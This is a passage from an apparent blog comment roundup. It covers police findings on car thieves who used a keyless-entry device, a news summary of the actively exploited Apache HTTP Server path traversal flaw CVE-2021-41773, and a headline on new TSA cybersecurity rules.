Police said footage recovered from Poulson’s phone showed him demonstrating “how quickly and easily the gadget gave them full access to the vehicles, accompanied by a commentary in mocking tones”.
The force added that the “significant investment required to buy one of the sophisticated devices suggested the thefts were planned and orchestrated crimes”.
Det Insp Vicky Vessey said the three men would have brought “distress, trauma and inconvenience to all the victims affected by their crimes”.
“The utter disregard they had for the victims, whose hard-earned vehicles were whisked away in seconds, is totally apparent from the flippant tone heard on the video footage we recovered from one of their phones,” she said
Tomi Engdahl says:
Apache HTTP Server Project patches exploited zero-day vulnerability
The critical vulnerability is being actively exploited in the wild.
https://www.zdnet.com/article/apache-http-server-project-patches-exploited-zero-day-vulnerability/
According to a security advisory dated October 5, the bug is known to be actively exploited in the wild.
The release of Apache HTTP Server version 2.4.49 fixed a slew of security flaws including a validation bypass bug, NULL pointer dereference, a denial-of-service issue, and a severe Server-Side Request Forgery (SSRF) vulnerability.
However, the update also inadvertently introduced a separate, critical issue: a path traversal vulnerability that can be exploited to map and leak files.
Tracked as CVE-2021-41773, the security flaw was discovered by Ash Daulton of the cPanel security team in a change made to path normalization in the server software.
“An attacker could use a path traversal attack to map URLs to files outside the expected document root,” the developers say. “If files outside of the document root are not protected by “Require all denied” these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts.”
Positive Technologies has reproduced the bug and Will Dormann, vulnerability analyst at CERT/CC, says that if the mod-cgi function is enabled on Apache HTTP Server 2.4.49, and the default Require all denied function is missing, then “CVE-2021-41773 is as RCE [remote code execution] as it gets.”
CVE-2021-41773 only impacts Apache HTTP Server 2.4.49
Tomi Engdahl says:
New cybersecurity regulations released by TSA for trains and planes
Emergency cybersecurity regulations for pipeline operators issued this summer were also released publicly this week.
https://www.zdnet.com/article/new-cybersecurity-regulations-released-by-tsa-for-trains-and-planes/